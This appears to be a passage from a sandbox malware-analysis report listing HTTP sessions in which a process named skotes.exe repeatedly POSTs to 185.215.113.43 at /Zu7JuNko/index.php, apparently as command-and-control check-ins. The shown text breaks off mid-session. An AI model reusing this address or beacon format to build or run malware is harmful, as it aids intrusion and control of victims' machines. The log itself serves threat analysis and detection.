Timestamp: Nov 22, 2024 17:13:05.556982994 CET  Bytes transferred: 156  Direction: OUT
Data:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Timestamp: Nov 22, 2024 17:13:06.989620924 CET  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 22 Nov 2024 16:13:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 1  Source IP: 192.168.2.8  Source Port: 49709  Destination IP: 185.215.113.43  Destination Port: 80  PID: 8076  Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Timestamp: Nov 22, 2024 17:13:08.630112886 CET  Bytes transferred: 310  Direction: OUT
Data:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Timestamp: Nov 22, 2024 17:13:09.966839075 CET  Bytes transferred: 196  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 22 Nov 2024 16:13:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 2  Source IP: 192.168.2.8  Source Port: 49710  Destination IP: 185.215.113.43  Destination Port: 80  PID: 8076  Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Timestamp: Nov 22, 2024 17:13:11.737935066 CET  Bytes transferred: 156  Direction: OUT
Data:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Timestamp: Nov 22, 2024 17:13:13.069196939 CET  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 22 Nov 2024 16:13:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 3  Source IP: 192.168.2.8  Source Port: 49711  Destination IP: 185.215.113.43  Destination Port: 80  PID: 8076  Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Timestamp: Nov 22, 2024 17:13:14.704283953 CET  Bytes transferred: 310  Direction: OUT
Data:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Timestamp: Nov 22, 2024 17:13:16.100543022 CET  Bytes transferred: 196  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 22 Nov 2024 16:13:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 4  Source IP: 192.168.2.8  Source Port: 49712  Destination IP: 185.215.113.43  Destination Port: 80  PID: 8076  Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Timestamp: Nov 22, 2024 17:13:17.862495899 CET  Bytes transferred: 156  Direction: OUT
Data:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Timestamp: Nov 22, 2024 17:13:19.284539938 CET  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 22 Nov 2024 16:13:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.8 | 49713 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:20.955998898 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:22.337306023 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.8 | 49714 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:24.095844984 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:25.472306013 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.8 | 49715 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:27.173180103 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:28.507762909 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.8 | 49716 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:30.256043911 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:31.594407082 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.8 | 49717 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:33.227725983 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:34.610512972 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.8 | 49718 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:36.349973917 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:37.739207983 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.8 | 49720 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:39.393069029 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:40.989097118 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.8 | 49721 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:42.740603924 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:44.299521923 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.8 | 49722 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:45.944297075 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:47.563025951 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.8 | 49723 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:49.305599928 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:51.051986933 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.8 | 49724 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:52.678206921 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:54.062625885 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.8 | 49725 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:55.806749105 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:57.203372002 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.8 | 49726 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:13:58.834858894 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:00.270227909 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.8 | 49727 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:14:02.054657936 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:03.398457050 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.8 | 49728 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:14:05.052788019 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:06.448580980 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.8 | 49729 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:14:08.212848902 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:09.558049917 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.8 | 49730 | 185.215.113.43 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Nov 22, 2024 17:14:11.208610058 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
